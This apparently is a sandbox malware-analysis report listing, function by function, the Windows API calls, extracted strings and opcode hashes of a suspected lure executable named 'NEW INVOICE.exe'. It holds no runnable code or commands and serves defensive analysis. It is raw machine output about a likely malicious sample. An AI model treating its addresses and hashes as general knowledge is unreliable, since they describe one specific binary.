                                                                                    • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                    • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00448625
                                                                                    • CreateMenu.USER32 ref: 0044863C
                                                                                    • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                    • IsMenu.USER32(?), ref: 004486EB
                                                                                    • CreatePopupMenu.USER32 ref: 004486F5
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                    • DrawMenuBar.USER32 ref: 00448742
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 176399719-4108050209
                                                                                    • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                    • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                    • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                    • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                    • GetParent.USER32 ref: 004692A4
                                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                    • GetParent.USER32 ref: 004692C7
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 2040099840-1403004172
                                                                                    • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                    • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                    • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                    • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                    • GetParent.USER32 ref: 0046949E
                                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                    • GetParent.USER32 ref: 004694C1
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent$_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 2040099840-1403004172
                                                                                    • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                    • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                    • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                    • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                    APIs
                                                                                      • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                    • SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
                                                                                    • SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                      • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3771399671-0
                                                                                    • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                    • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                    • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                    • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 3413494760-0
                                                                                    • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                    • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                    • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                    • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                    • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2156557900-0
                                                                                    • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                    • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                    • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                    • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsicoll
                                                                                    • String ID: 0%d$DOWN$OFF
                                                                                    • API String ID: 3832890014-468733193
                                                                                    • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                    • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                    • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                    • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                    • VariantClear.OLEAUT32 ref: 0045E970
                                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                    • __swprintf.LIBCMT ref: 0045EB1F
                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                    Strings
                                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 43541914-1568723262
                                                                                    • Opcode ID: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                                    • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                    • Opcode Fuzzy Hash: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                                    • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                    APIs
                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                    • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DecrementInterlocked$Sleep
                                                                                    • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                    • API String ID: 2250217261-3412429629
                                                                                    • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                                    • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                    • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                                    • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                    • API String ID: 0-1603158881
                                                                                    • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                    • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                    • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                    • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00479D1F
                                                                                    • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                    • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                    • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                      • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                      • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                      • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                    • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                    • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 665237470-60002521
                                                                                    • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                    • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                    • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                    • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                    • String ID: HH
                                                                                    • API String ID: 535477410-2761332787
                                                                                    • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                    • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                    • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                    • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0045F317
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                    • IsMenu.USER32(?), ref: 0045F380
                                                                                    • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                    • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                    • String ID: 0$2
                                                                                    • API String ID: 3311875123-3793063076
                                                                                    • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                    • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                    • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                    • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\NEW INVOICE.exe), ref: 0043719E
                                                                                    • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                    • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                    • _printf.LIBCMT ref: 004371EC
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                    • C:\Users\user\Desktop\NEW INVOICE.exe, xrefs: 00437189
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_printf
                                                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\NEW INVOICE.exe
                                                                                    • API String ID: 220974073-1990471871
                                                                                    • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                    • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                    • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                    • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                    • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                    • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                    • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                    APIs
